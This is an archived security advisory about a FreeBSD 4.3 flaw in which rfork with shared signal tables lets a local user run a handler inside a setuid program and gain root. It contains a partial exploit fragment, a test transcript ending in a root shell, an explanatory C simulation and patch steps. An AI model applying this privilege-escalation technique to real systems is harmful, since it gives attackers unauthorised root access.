FreeBSD 4.3 design flaw lets a local attacker obtain system privileges - vulnerability warning - Black Bar Safety Net (myhack58)

ID MYHACK58:62200714957
Type myhack58
Reporter Anonymous
Modified 2007-04-10T00:00:00


FreeBSD 4.3 has been found to contain a design vulnerability that allows a user to insert signal handlers into another process. The problem lies in rfork(RFPROC|RFSIGSHARE): the parent and the child share a single signal-handler table, so if the child exec()s a setuid program and the parent afterwards installs a signal handler, that handler is also present in the child. Sending the signal to the child then causes the handler to execute inside the setuid process, with that process's privileges. A local attacker can exploit this to obtain root privileges.

The following code is provided only for testing and research of this vulnerability; if you put it to improper use, you do so at your own risk. The page reproduces only a fragment of the file (the elisions below are the page's own):

-------------vvfreebsd.c----------------------
/} }
printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);
if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
//
if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
kill(pid,MYSIG);
printf("done\n");
while(42);
}
...............................
.........................
.............

Affected versions: FreeBSD 4.3, 4.2, 4.1, 4.0; earlier versions may also be affected.

Solution: none at the time of writing (see the patch instructions below).

** 2001-07-14 added by NetDemon (netdemon@20cn.net) **
Test procedure / usage:
netdemon% gcc -o vvbsd vvbsd.c
netdemon% cp /bin/sh /tmp
netdemon% ./vvbsd
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe71
child=61056
login: login: #
done
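To make the sharing semantics concrete, here is a small C model of a reference-counted signal-handler table, written for this page as an added illustration; it is neither FreeBSD kernel code nor Guninski's exploit. It reproduces the vulnerable behaviour described above (the parent installs a handler after the child has exec'd a setuid image, and the handler is delivered inside that image) and an assumed corrected behaviour, in which exec of a setuid image gives the process a private copy of the table whenever the table is shared. The structure and function names (procsig, model_rfork_sigshare, model_exec_setuid_root, attack_succeeds) are this example's own, as are the pids and uids.

```c
/* Added model of the FreeBSD 4.3 RFSIGSHARE signal-table sharing flaw.
 * Not FreeBSD code: names, layout and the "fixed" behaviour are this
 * example's own simplifications. */
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>

#define NSIG_MODEL 32
typedef void (*handler_fn)(int);

/* One signal-handler table, reference counted like the kernel's. */
struct procsig {
    int refcnt;
    handler_fn handlers[NSIG_MODEL];
};

struct proc {
    int pid;
    int euid;            /* becomes 0 after exec of a setuid-root image */
    struct procsig *sig; /* may be shared with another proc */
};

/* Stand-in for the attacker's code; only its address matters here. */
static void attacker_handler(int sig) { (void)sig; }

static struct procsig *procsig_alloc(void)
{
    struct procsig *ps = calloc(1, sizeof *ps);
    if (!ps) abort();
    ps->refcnt = 1;
    for (int i = 0; i < NSIG_MODEL; i++) ps->handlers[i] = SIG_DFL;
    return ps;
}

static void procsig_release(struct procsig *ps)
{
    if (--ps->refcnt == 0) free(ps);
}

static struct proc *proc_new(int pid, int euid, struct procsig *ps)
{
    struct proc *p = calloc(1, sizeof *p);
    if (!p) abort();
    p->pid = pid; p->euid = euid; p->sig = ps;
    return p;
}

/* rfork(RFPROC|RFSIGSHARE): new process, same handler table. */
static struct proc *model_rfork_sigshare(const struct proc *parent, int pid)
{
    parent->sig->refcnt++;
    return proc_new(pid, parent->euid, parent->sig);
}

/* sigaction() writes into whatever table the caller currently holds. */
static void model_sigaction(struct proc *p, int sig, handler_fn h)
{
    p->sig->handlers[sig] = h;
}

/* exec of a setuid-root image. Both variants reset caught handlers to
 * SIG_DFL (ordinary exec semantics). The fixed variant first replaces a
 * shared table with a private copy, so the parent can no longer reach it. */
static void model_exec_setuid_root(struct proc *p, int fixed)
{
    if (fixed && p->sig->refcnt > 1) {
        struct procsig *priv = procsig_alloc();
        procsig_release(p->sig);
        p->sig = priv;
    }
    for (int i = 0; i < NSIG_MODEL; i++)
        if (p->sig->handlers[i] != SIG_IGN) p->sig->handlers[i] = SIG_DFL;
    p->euid = 0;
}

/* The handler the kernel would run on delivery of sig to p. */
static handler_fn model_deliver(const struct proc *p, int sig)
{
    return p->sig->handlers[sig];
}

/* Returns 1 if attacker-controlled code would run with euid 0. */
int attack_succeeds(int fixed)
{
    struct proc *parent = proc_new(1000, 1001, procsig_alloc());
    struct proc *child = model_rfork_sigshare(parent, 1001);
    model_exec_setuid_root(child, fixed);               /* child: setuid program */
    model_sigaction(parent, SIGUSR1, attacker_handler); /* parent: handler after exec */
    handler_fn h = model_deliver(child, SIGUSR1);       /* parent: kill(pid, SIGUSR1) */
    int won = (child->euid == 0 && h == attacker_handler);
    procsig_release(child->sig);
    procsig_release(parent->sig);
    free(child);
    free(parent);
    return won;
}

int main(void)
{
    printf("vulnerable kernel: attacker handler runs as root? %s\n",
           attack_succeeds(0) ? "yes" : "no");
    printf("patched kernel:    attacker handler runs as root? %s\n",
           attack_succeeds(1) ? "yes" : "no");
    return 0;
}
```

The point the model isolates is that resetting handlers at exec time is not enough: the table itself stays writable by the unprivileged parent, so any handler installed after the exec lands in the setuid process. Breaking the sharing at exec is what closes that window.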

How to apply the FreeBSD patch (the .asc file is the detached PGP signature for the patch; verify it against the FreeBSD security officer key before applying, and rebuild and reinstall the kernel afterwards, since this patches kernel source):

fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch

fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch.asc

cd /usr/src/sys/kern

patch -p < /path/to/patch